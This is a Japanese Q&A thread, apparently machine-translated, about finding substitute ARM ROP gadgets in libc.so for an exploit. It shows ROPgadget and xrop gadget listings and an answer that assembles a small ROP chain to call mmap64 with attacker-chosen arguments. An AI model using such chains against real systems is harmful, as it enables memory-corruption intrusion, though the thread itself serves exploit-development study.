ARM-ガジェットチェーンでのROPプログラミング/活用
残念ながら、このガジェットはlibc.soで見つかりません。さまざまな手順を使用して、これをどのように再プログラムできますか?
pop {r0, r1, r2, r3, pc}
どの命令が同じことを達成しますか?どのガジェットを探す必要がありますか?
それはこれに関連しています exploit
# pivot swaps stack then returns to pop {pc}
page += p32(pop_r0_r1_r2_r3_pc)
おかげで、
更新:
これらのガジェットは私のlibc.soで利用できます。
ROPgadgetとxropのどちらが優れていますか? xropは明らかにより多くのガジェットを示しました
ROPgadget --binary libc.so --ropchain --only "pop"
Gadgets information
============================================================
0x0001061c : pop {r0, pc}
0x00042664 : pop {r1, pc}
0x00042d00 : pop {r3, pc}
0x0000f7dc : pop {r4, pc}
0x00041658 : pop {r4, r5, pc}
0x0004198c : pop {r4, r5, r6, pc}
0x00042c2c : pop {r4, r5, r6, r7, pc}
そして、xropを使用します。
Usage: xrop [-r Arch] [-b bits] [-e bytes] [-l endian] [-a relocaddr] [-s regex] [-v] [-h] inputfile
-b (16 | 32 | 64) sets the processor mode
-r (arm | mips | powerpc | x86) raw binary file of given architecture
-v displays the version number
-l (b | e) big or little endian
-e skips <bytes> of header
-a rellocate at given address
-n disable colors in the output
-s filter gadgets with <regex>
-h prints this menu
$ ./xrop -r arm -b 32 -l b -s pop libc.so
> 0x19474 rsbmi r4, r8, r8, ror #18
0x19478 andsmi r5, sl, #134217729 ; 0x8000001
0x1947c mvnpl r0, #0, 4
0x19480 popeq {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________
> 0x230cc mvnseq r0, #-1073741814 ; 0xc000000a
0x230d0 ldrdeq pc, [sl], -r1
0x230d4 ldreq r2, [r1, #2400]! ; 0x960
0x230d8 popcc {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________
> 0x2f1f0 rsbmi r0, r1, #1073741848 ; 0x40000018
0x2f1f4 popeq {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8 teqeq r3, r7, ror #10
0x2f1fc mrc2 10, 6, fp, cr12, cr8, {4}
_______________________________________________________________
> 0x3e520 ldrdls r0, [r2, #-8]
0x3e524 popcc {r3, r6, r8, sl}
0x3e528 eoreq r7, r1, r4, asr #16
0x3e52c ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________
> 0x3e664 ldrdls r0, [r2, #-8]
0x3e668 popcc {r3, r6, r8, sl}
0x3e66c eoreq r7, r1, r4, asr #16
0x3e670 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________
> 0x40244 svcmi 0x00f0ff30
0x40248 popeq {r0, r2, r4, r5, r7, fp}
0x4024c ldrhteq r3, [r1], r9
_______________________________________________________________
> 1 + 0x1a84 movs r2, r2
1 + 0x1a86 movs r0, r1
1 + 0x1a88 asrs r7, r7, #15
1 + 0x1a8a movs r0, r0
1 + 0x1a8c pop {r0, r1, r2, r6, pc}
_______________________________________________________________
> 1 + 0xfb60 subs r7, #192 ; 0xc0
1 + 0xfb62 adds r0, #1
1 + 0xfb64 pop {r4, r5, r6, r7}
1 + 0xfb66 subs r0, #1
1 + 0xfb68 strb r7, [r0, #1]
_______________________________________________________________
> 1 + 0xfb5e tst.w r5, #98304 ; 0x18000
1 + 0xfb62 adds r0, #1
1 + 0xfb64 pop {r4, r5, r6, r7}
1 + 0xfb66 subs r0, #1
1 + 0xfb68 strb r7, [r0, #1]
_______________________________________________________________
> 1 + 0x119e6 pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8 asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x11a46 pop {r0, r2, r4, r5, r7}
1 + 0x11a48 asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x11c2e pop {r2, r3, r4, r6, r7}
1 + 0x11c30 lsrs r5, r7, #2
_______________________________________________________________
> 1 + 0x12db0 pop {r0, r1, r3, r4, r5}
1 + 0x12db2 movs r0, #0
1 + 0x12db4 strb r7, [r0, #1]
_______________________________________________________________
> 1 + 0x21c72 subs r0, r0, r4
1 + 0x21c74 vpop {d8}
1 + 0x21c78 vmov r0, r1, d1
1 + 0x21c7c asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x21c6e cmp r3, #17
1 + 0x21c70 vmul.f64 d1, d1, d0
1 + 0x21c74 vpop {d8}
1 + 0x21c78 vmov r0, r1, d1
1 + 0x21c7c asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x21c6c vmov d1, r2, r3
1 + 0x21c70 vmul.f64 d1, d1, d0
1 + 0x21c74 vpop {d8}
1 + 0x21c78 vmov r0, r1, d1
1 + 0x21c7c asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x2db40 pop {r0, r3, r4, r5}
1 + 0x2db42 asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x2dc90 lsrs r4, r2, #12
1 + 0x2dc92 vpop {d8-d9}
1 + 0x2dc96 vadd.f64 d5, d3, d4
1 + 0x2dc9a vmovlt r0, r1, d5
1 + 0x2dc9e asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x2dc8e vmov d4, r0, r1
1 + 0x2dc92 vpop {d8-d9}
1 + 0x2dc96 vadd.f64 d5, d3, d4
1 + 0x2dc9a vmovlt r0, r1, d5
1 + 0x2dc9e asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x4ea9a cbnz r0, 0x4eacc
1 + 0x4ea9c cbnz r2, 0x4eb0e
1 + 0x4ea9e pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________
> 1 + 0x5954c movs r0, r0
1 + 0x5954e movs r0, r1
1 + 0x59550 movs r1, r3
1 + 0x59552 movs r0, r0
1 + 0x59554 pop {r0, r1, r2, r6}
_______________________________________________________________
> 1 + 0x6b1cc movs r2, r2
1 + 0x6b1ce movs r0, r1
1 + 0x6b1d0 ldrsh r3, [r7, r4]
1 + 0x6b1d2 movs r0, r0
1 + 0x6b1d4 pop {r0, r1, r2, r6, pc}
_______________________________________________________________
$ ./xrop -r arm -b 64 -l b -s pop libc.so
> 0x19474 rsbmi r4, r8, r8, ror #18
0x19478 andsmi r5, sl, #134217729 ; 0x8000001
0x1947c mvnpl r0, #0, 4
0x19480 popeq {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________
> 0x230cc mvnseq r0, #-1073741814 ; 0xc000000a
0x230d0 ldrdeq pc, [sl], -r1
0x230d4 ldreq r2, [r1, #2400]! ; 0x960
0x230d8 popcc {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________
> 0x2f1f0 rsbmi r0, r1, #1073741848 ; 0x40000018
0x2f1f4 popeq {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8 teqeq r3, r7, ror #10
0x2f1fc mrc2 10, 6, fp, cr12, cr8, {4}
_______________________________________________________________
> 0x3e520 ldrdls r0, [r2, #-8]
0x3e524 popcc {r3, r6, r8, sl}
0x3e528 eoreq r7, r1, r4, asr #16
0x3e52c ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________
> 0x3e664 ldrdls r0, [r2, #-8]
0x3e668 popcc {r3, r6, r8, sl}
0x3e66c eoreq r7, r1, r4, asr #16
0x3e670 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________
> 0x40244 svcmi 0x00f0ff30
0x40248 popeq {r0, r2, r4, r5, r7, fp}
0x4024c ldrhteq r3, [r1], r9
_______________________________________________________________
> 1 + 0x1a84 movs r2, r2
1 + 0x1a86 movs r0, r1
1 + 0x1a88 asrs r7, r7, #15
1 + 0x1a8a movs r0, r0
1 + 0x1a8c pop {r0, r1, r2, r6, pc}
_______________________________________________________________
> 1 + 0xfb60 subs r7, #192 ; 0xc0
1 + 0xfb62 adds r0, #1
1 + 0xfb64 pop {r4, r5, r6, r7}
1 + 0xfb66 subs r0, #1
1 + 0xfb68 strb r7, [r0, #1]
_______________________________________________________________
> 1 + 0xfb5e tst.w r5, #98304 ; 0x18000
1 + 0xfb62 adds r0, #1
1 + 0xfb64 pop {r4, r5, r6, r7}
1 + 0xfb66 subs r0, #1
1 + 0xfb68 strb r7, [r0, #1]
_______________________________________________________________
> 1 + 0x119e6 pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8 asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x11a46 pop {r0, r2, r4, r5, r7}
1 + 0x11a48 asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x11c2e pop {r2, r3, r4, r6, r7}
1 + 0x11c30 lsrs r5, r7, #2
_______________________________________________________________
> 1 + 0x12db0 pop {r0, r1, r3, r4, r5}
1 + 0x12db2 movs r0, #0
1 + 0x12db4 strb r7, [r0, #1]
_______________________________________________________________
> 1 + 0x21c72 subs r0, r0, r4
1 + 0x21c74 vpop {d8}
1 + 0x21c78 vmov r0, r1, d1
1 + 0x21c7c asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x21c6e cmp r3, #17
1 + 0x21c70 vmul.f64 d1, d1, d0
1 + 0x21c74 vpop {d8}
1 + 0x21c78 vmov r0, r1, d1
1 + 0x21c7c asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x21c6c vmov d1, r2, r3
1 + 0x21c70 vmul.f64 d1, d1, d0
1 + 0x21c74 vpop {d8}
1 + 0x21c78 vmov r0, r1, d1
1 + 0x21c7c asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x2db40 pop {r0, r3, r4, r5}
1 + 0x2db42 asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x2dc90 lsrs r4, r2, #12
1 + 0x2dc92 vpop {d8-d9}
1 + 0x2dc96 vadd.f64 d5, d3, d4
1 + 0x2dc9a vmovlt r0, r1, d5
1 + 0x2dc9e asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x2dc8e vmov d4, r0, r1
1 + 0x2dc92 vpop {d8-d9}
1 + 0x2dc96 vadd.f64 d5, d3, d4
1 + 0x2dc9a vmovlt r0, r1, d5
1 + 0x2dc9e asrs r5, r7, #2
_______________________________________________________________
> 1 + 0x4ea9a cbnz r0, 0x4eacc
1 + 0x4ea9c cbnz r2, 0x4eb0e
1 + 0x4ea9e pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________
> 1 + 0x5954c movs r0, r0
1 + 0x5954e movs r0, r1
1 + 0x59550 movs r1, r3
1 + 0x59552 movs r0, r0
1 + 0x59554 pop {r0, r1, r2, r6}
_______________________________________________________________
> 1 + 0x6b1cc movs r2, r2
1 + 0x6b1ce movs r0, r1
1 + 0x6b1d0 ldrsh r3, [r7, r4]
1 + 0x6b1d2 movs r0, r0
1 + 0x6b1d4 pop {r0, r1, r2, r6, pc}
_______________________________________________________________
私は一目見ませんでしたが、1 + 0x59554 : pop {r0, r1, r2, r6} xropの結果、および0x00042d00 : pop {r3, pc} ROPgadgetの結果、これをROPスタックに収めてみましたか?
page += p32(pop_r0_r1_r2_r6_pc) #xrop result with loaded offset
page += p32(r0_popval) #r0 - mmap() address in exploit.
page += p32(r1_popval) #r1 - size in exploit.
page += p32(r2_popval) #r2 - protection in exploit.
page += p32(r6_popval) #r6 - 0x66666666 looks just like recognizable junk.
page += p32(pop_r3_pc) #ROPgadget result with loaded offset
page += p32(r3_popval) #r3 - flags for mmap in exploit.
page += p32(mmap64_address) #for popping into pc to call mmap64().
それらが有効なガジェットである場合は問題ないと思います。モード間の分岐と交換に適したガジェットがある場合は、Thumbガジェットの検索も検討してください。
私はROPgadgetが問題のない同様の資料を学習してきましたが、必要なものをより速く実行するための準備が整った機能のある方を使用することをお勧めします。たとえば、ROPgadgetで自動化されたARM= ropchain生成)が好きですが、それは機能ではありません。